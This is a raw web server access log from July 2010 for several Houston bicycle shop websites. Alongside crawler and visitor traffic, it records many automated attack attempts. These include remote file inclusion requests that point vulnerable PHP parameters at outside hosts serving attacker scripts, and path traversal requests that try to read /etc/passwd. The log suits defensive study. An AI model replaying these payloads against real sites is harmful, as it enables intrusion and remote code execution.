61.247.204.38 - - [10/Jul/2010:17:26:03 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "houstonbikeshop.com"
61.247.204.38 - - [10/Jul/2010:17:26:05 -0700] "GET /bullitinboard/viewtopic.php?p=2508 HTTP/1.1" 200 533 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "houstonbikeshop.com"
74.196.225.150 - - [10/Jul/2010:17:28:38 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16" "www.svbikes.com"
74.196.225.150 - - [10/Jul/2010:17:28:39 -0700] "GET /favicon.ico HTTP/1.1" 404 - "http://www.svbikes.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16" "www.svbikes.com"
82.146.58.53 - - [10/Jul/2010:17:39:43 -0700] "GET /logs/access_091010.log HTTP/1.0" 200 6312959 "http://svbikes.com/logs/access_091010.log" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "svbikes.com"
183.179.57.11 - - [10/Jul/2010:17:40:06 -0700] "GET /logs/scripts.log HTTP/1.0" 200 100037 "-" "-" "houstonbikeshop.com"
71.14.156.21 - - [10/Jul/2010:18:11:32 -0700] "GET /logs/access.log%20%20/?sourcedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
71.14.156.21 - - [10/Jul/2010:18:11:32 -0700] "GET /?sourcedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
71.14.156.21 - - [10/Jul/2010:18:11:32 -0700] "GET /logs/?sourcedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "houstonbikeshop.com"
71.14.156.21 - - [10/Jul/2010:18:34:49 -0700] "GET /logs/access.log/?sourcedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.109.1.194 - - [10/Jul/2010:18:40:52 -0700] "GET /logs/access_091010.log HTTP/1.0" 200 6312959 "http://svbikes.com/logs/access_091010.log" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5" "svbikes.com"
71.14.156.21 - - [10/Jul/2010:19:06:19 -0700] "GET /logs/access.log/?sourcedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.249.65.37 - - [10/Jul/2010:19:10:19 -0700] "GET /aboutus.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "bicyclestoreshouston.com"
178.154.163.29 - - [10/Jul/2010:19:15:00 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
66.249.65.34 - - [10/Jul/2010:19:17:14 -0700] "GET /Product.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "bicyclestoreshouston.com"
62.109.1.194 - - [10/Jul/2010:19:39:18 -0700] "GET /logs/access_091010.log HTTP/1.0" 200 6312959 "http://svbikes.com/logs/access_091010.log" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19" "svbikes.com"
91.201.66.22 - - [10/Jul/2010:20:01:37 -0700] "GET /logs/access.log HTTP/1.0" 200 152836 "http://houstonbikeshop.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "houstonbikeshop.com"
98.197.230.245 - - [10/Jul/2010:20:04:13 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/profile/1742501" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MDDC; .NET4.0C)" "www.svbikes.com"
98.197.230.245 - - [10/Jul/2010:20:04:13 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MDDC; .NET4.0C)" "www.svbikes.com"
65.60.20.66 - - [10/Jul/2010:20:08:40 -0700] "GET /logs/access.log//includes/mambo.php/mosConfig_absolute_path=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [10/Jul/2010:20:08:40 -0700] "GET /includes/mambo.php/mosConfig_absolute_path=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [10/Jul/2010:20:08:40 -0700] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.115.111.243 - - [10/Jul/2010:20:10:35 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.svbikes.com"
125.141.91.138 - - [10/Jul/2010:20:11:29 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Jul/2010:20:11:29 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Jul/2010:20:11:29 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Jul/2010:20:11:53 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Jul/2010:20:11:53 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Jul/2010:20:11:54 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Jul/2010:20:12:05 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Jul/2010:20:12:05 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Jul/2010:20:12:05 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.46.13.98 - - [10/Jul/2010:20:13:24 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
207.46.13.98 - - [10/Jul/2010:20:14:35 -0700] "GET / HTTP/1.1" 200 1764 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
67.195.112.217 - - [10/Jul/2010:20:18:32 -0700] "GET /bullitinboard/viewtopic.php?p=15918 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
208.115.111.243 - - [10/Jul/2010:20:53:40 -0700] "GET /blog/ HTTP/1.1" 401 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.svbikes.com"
208.115.111.243 - - [10/Jul/2010:20:53:41 -0700] "GET /fit.html HTTP/1.1" 200 17443 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.svbikes.com"
208.115.111.243 - - [10/Jul/2010:20:53:41 -0700] "GET /logs/ HTTP/1.1" 200 2940 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.svbikes.com"
208.115.111.243 - - [10/Jul/2010:20:53:42 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.svbikes.com"
208.115.111.243 - - [10/Jul/2010:20:53:43 -0700] "GET /tmp/?D=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.svbikes.com"
208.115.111.243 - - [10/Jul/2010:20:53:43 -0700] "GET /tmp/?M=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.svbikes.com"
208.115.111.243 - - [10/Jul/2010:20:53:44 -0700] "GET /tmp/?N=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.svbikes.com"
208.115.111.243 - - [10/Jul/2010:20:53:45 -0700] "GET /tmp/?S=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.svbikes.com"
208.115.111.243 - - [10/Jul/2010:20:53:46 -0700] "GET /tmp/mailError.log HTTP/1.1" 200 4160 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.svbikes.com"
125.141.91.138 - - [10/Jul/2010:21:49:18 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
125.141.91.138 - - [10/Jul/2010:21:49:18 -0700] "GET /logs/access_100510.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
125.141.91.138 - - [10/Jul/2010:21:49:18 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
125.141.91.138 - - [10/Jul/2010:21:49:19 -0700] "GET /logs/access_100510.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
125.141.91.138 - - [10/Jul/2010:21:49:19 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
125.141.91.138 - - [10/Jul/2010:21:49:19 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
125.141.91.138 - - [10/Jul/2010:21:49:23 -0700] "GET /logs/access_100510.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
125.141.91.138 - - [10/Jul/2010:21:49:23 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
125.141.91.138 - - [10/Jul/2010:21:49:23 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
207.46.195.233 - - [10/Jul/2010:22:09:40 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
119.63.193.75 - - [10/Jul/2010:22:53:45 -0700] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
119.63.193.75 - - [10/Jul/2010:22:55:46 -0700] "GET /bullitinboard/viewtopic.php?p=3505 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
207.46.195.233 - - [10/Jul/2010:22:56:41 -0700] "GET /bullitinboard/viewtopic.php?p=15679 HTTP/1.1" 200 533 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
178.154.163.29 - - [10/Jul/2010:22:58:23 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
188.72.250.201 - - [10/Jul/2010:23:03:06 -0700] "GET /logs/access.log HTTP/1.1" 200 161976 "http://www.svbikes.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.svbikes.com"
87.250.252.242 - - [10/Jul/2010:23:08:15 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "bicyclestoreshouston.com"
83.16.100.218 - - [10/Jul/2010:23:16:39 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.16.100.218 - - [10/Jul/2010:23:16:39 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.16.100.218 - - [10/Jul/2010:23:16:39 -0700] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.127.248.175 - - [10/Jul/2010:23:19:19 -0700] "GET /?sourcedir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
188.127.248.175 - - [10/Jul/2010:23:19:19 -0700] "GET /logs/?sourcedir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "houstonbikeshop.com"
188.127.248.175 - - [10/Jul/2010:23:19:20 -0700] "GET /logs/access.log/?sourcedir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.127.248.175 - - [10/Jul/2010:23:20:12 -0700] "GET /?sourcedir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
188.127.248.175 - - [10/Jul/2010:23:20:12 -0700] "GET /logs/access.log/?sourcedir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.127.248.175 - - [10/Jul/2010:23:20:12 -0700] "GET /logs/?sourcedir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.249.65.47 - - [10/Jul/2010:23:22:58 -0700] "GET /services.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "bicyclestoreshouston.com"
83.16.100.218 - - [10/Jul/2010:23:30:14 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.135.41.16 - - [10/Jul/2010:23:32:23 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:32:23 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:32:24 -0700] "GET /logs/access_100510.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:32:44 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:32:44 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:32:44 -0700] "GET /logs/access_100510.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:32:45 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:32:45 -0700] "GET /logs/access_100510.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:32:45 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:32:45 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:32:45 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:32:45 -0700] "GET /logs/access_100510.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.249.65.14 - - [10/Jul/2010:23:33:46 -0700] "GET /contactus.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "bicyclestoreshouston.com"
92.241.175.4 - - [10/Jul/2010:23:34:31 -0700] "GET /logs/access.log//admin.cropcanvas.php?cropimagedir=http://t4.fileave.com/scan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.241.175.4 - - [10/Jul/2010:23:34:31 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://t4.fileave.com/scan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.241.175.4 - - [10/Jul/2010:23:34:31 -0700] "GET /admin.cropcanvas.php?cropimagedir=http://t4.fileave.com/scan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.135.41.16 - - [10/Jul/2010:23:40:40 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:40:40 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:40:40 -0700] "GET /logs/access_100510.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:40:54 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:40:54 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.135.41.16 - - [10/Jul/2010:23:40:54 -0700] "GET /logs/access_100510.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ict.mbu.ac.th/th/cache/admin/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
66.249.65.42 - - [10/Jul/2010:23:54:09 -0700] "GET /Accessories.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "bicyclestoreshouston.com"
87.250.252.242 - - [10/Jul/2010:23:58:17 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
178.154.163.29 - - [11/Jul/2010:00:01:05 -0700] "GET /bullitinboard/viewtopic.php?p=10075 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
67.195.115.87 - - [11/Jul/2010:00:11:34 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.115.87 - - [11/Jul/2010:00:11:34 -0700] "GET /temporarypreviewfile.html HTTP/1.0" 200 1690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
92.241.175.4 - - [11/Jul/2010:00:17:56 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
92.241.175.4 - - [11/Jul/2010:00:24:10 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
208.115.111.243 - - [11/Jul/2010:00:24:15 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.svbikes.com"
208.80.193.30 - - [11/Jul/2010:00:26:16 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; MEGAUPLOAD 1.0; IEMB3)" "bicyclestoreshouston.com"
195.191.54.159 - - [11/Jul/2010:00:29:35 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
195.191.54.159 - - [11/Jul/2010:00:29:37 -0700] "GET / HTTP/1.0" 200 1748 "http://bicyclestoreshouston.com/" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
195.191.54.159 - - [11/Jul/2010:00:29:38 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
178.154.163.29 - - [11/Jul/2010:00:33:24 -0700] "GET /bullitinboard/viewtopic.php?p=4088 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
178.154.163.29 - - [11/Jul/2010:00:54:04 -0700] "GET /bullitinboard/viewtopic.php?p=12903 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
83.140.191.145 - - [11/Jul/2010:00:58:03 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.smarttrain.edu.vn/components/com_wrapper/views/wrapper/tmpl/data/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.140.191.145 - - [11/Jul/2010:00:58:03 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.smarttrain.edu.vn/components/com_wrapper/views/wrapper/tmpl/data/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.140.191.145 - - [11/Jul/2010:00:58:03 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.smarttrain.edu.vn/components/com_wrapper/views/wrapper/tmpl/data/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.140.191.145 - - [11/Jul/2010:00:58:13 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.smarttrain.edu.vn/components/com_wrapper/views/wrapper/tmpl/data/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.140.191.145 - - [11/Jul/2010:00:58:13 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.smarttrain.edu.vn/components/com_wrapper/views/wrapper/tmpl/data/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.140.191.145 - - [11/Jul/2010:00:58:13 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.smarttrain.edu.vn/components/com_wrapper/views/wrapper/tmpl/data/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.140.191.145 - - [11/Jul/2010:00:58:20 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.smarttrain.edu.vn/components/com_wrapper/views/wrapper/tmpl/data/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.140.191.145 - - [11/Jul/2010:00:58:20 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.smarttrain.edu.vn/components/com_wrapper/views/wrapper/tmpl/data/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
